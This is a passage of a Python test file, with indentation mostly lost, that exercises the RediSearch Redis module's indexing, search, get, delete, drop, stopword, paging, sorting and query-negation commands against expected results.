'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text').ok()
r.expect('ft.add', 'idx', 'doc1', 0.5,
'fields','title', 'hello world', 'body', 'lorem ist ipsum').ok()
r.expect('ft.add', 'idx', 'doc2', 1.0,
'fields', 'title', 'hello another world', 'body', 'lorem ist ipsum lorem lorem').ok()
# order of documents might change after reload
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello')
expected = [2L, 'doc2', ['title', 'hello another world', 'body', 'lorem ist ipsum lorem lorem'],
'doc1', ['title', 'hello world', 'body', 'lorem ist ipsum']]
env.assertEqual(toSortedFlatList(res), toSortedFlatList(expected))
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
expected = ['doc2', 'doc1']
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
# Test searching WITHSCORES
res = r.execute_command('ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
env.assertTrue(float(res[2]) > 0)
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command('ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
env.assertTrue(float(res[2]) > 0)
env.assertTrue(float(res[4]) > 0)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'text'))
env.expect('ft.get').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx', 'foo', 'bar').error().contains("wrong number of arguments")
env.expect('ft.mget').error().contains("wrong number of arguments")
env.expect('ft.mget', 'idx').error().contains("wrong number of arguments")
env.expect('ft.mget', 'fake_idx').error().contains("wrong number of arguments")
env.expect('ft.get fake_idx foo').error().contains("Unknown Index name")
env.expect('ft.mget fake_idx foo').error().contains("Unknown Index name")
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertEqual(set(['foo', 'hello world', 'bar', 'wat wat']), set(res))
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
env.expect('ft.get', 'no_idx', 'doc0').error().contains("Unknown Index name")
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertEqual(set(['foo', 'hello world', 'bar', 'wat wat']), set(res))
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
assert r.cmd('ft.del', 'idx', 'coverage') == 0
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10')
r.assertEqual([None], res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
env.expect('ft.add idx doc 0.1 language arabic payload redislabs fields foo foo').ok()
env.expect('ft.get idx doc').equal(['foo', 'foo'])
res = env.cmd('hgetall doc')
env.assertEqual(set(res), set(['foo', 'foo', '__score', '0.1', '__language', 'arabic', '__payload', 'redislabs']))
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
env.expect('ft.del', 'fake_idx', 'doc1').error()
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# second delete should return 0
# TODO: return 0 if doc wasn't found
#env.assertEqual(0, r.execute_command(
# 'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
env.flush()
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
env.expect('FT.DROP', 'idx', 'KEEPDOCS', '666').error().contains("wrong number of arguments")
def testDropIndex(env):
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo').ok()
for i in range(100):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497').ok()
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
r.expect('FT.DROPINDEX', 'idx', 'dd').ok()
keys = r.keys('*')
env.assertEqual(0, len(keys))
env.flush()
# Now do the same with KEEPDOCS
env.expect('ft.create', 'idx', 'ON', 'HASH',
'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo').ok()
for i in range(100):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497').ok()
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
r.expect('FT.DROPINDEX', 'idx').ok()
keys = r.keys('*')
env.assertListEqual(sorted("doc%d" %k for k in range(100)), sorted(keys))
env.expect('FT.DROPINDEX', 'idx', 'dd', '666').error().contains("wrong number of arguments")
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'ON', 'HASH', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
if not env.isCluster():
res = env.cmd('ft.info', 'idx2')
env.assertEqual(res[39], ['hello', 'world'])
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'ON', 'HASH', 'stopwords', 0,
'schema', 'foo', 'text'))
if not env.isCluster():
res = env.cmd('ft.info', 'idx3')
env.assertEqual(res[39], [])
#for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', 'idx', 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', 'idx', 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test was taken from Java's test suite
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
if not env.isCluster():
# too specific a check to run on cluster; todo: make it generic enough
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[7][1][4], 'NOINDEX')
env.assertEqual(res[7][2][6], 'NOINDEX')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'SCORE_FIELD', '__score',
'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non-indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
env.expect('ft.add', 'idx', 'doc12', '0.1', 'replace', 'partial',
'fields', 'num1', 'redis').equal('OK')
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3','extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
# We reindex even though there are no new fields; only the score is updated, which affects the result score
env.assertEqual(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
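    # Negation: for each term, the inclusive and exclusive result sets are disjoint and together cover all N docs.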
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
    # NOT on a non-existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
    # NOT on the same term (present in every document)
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
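    # Equivalent flat, field-scoped and nested intersection queries must all return identical results.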
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
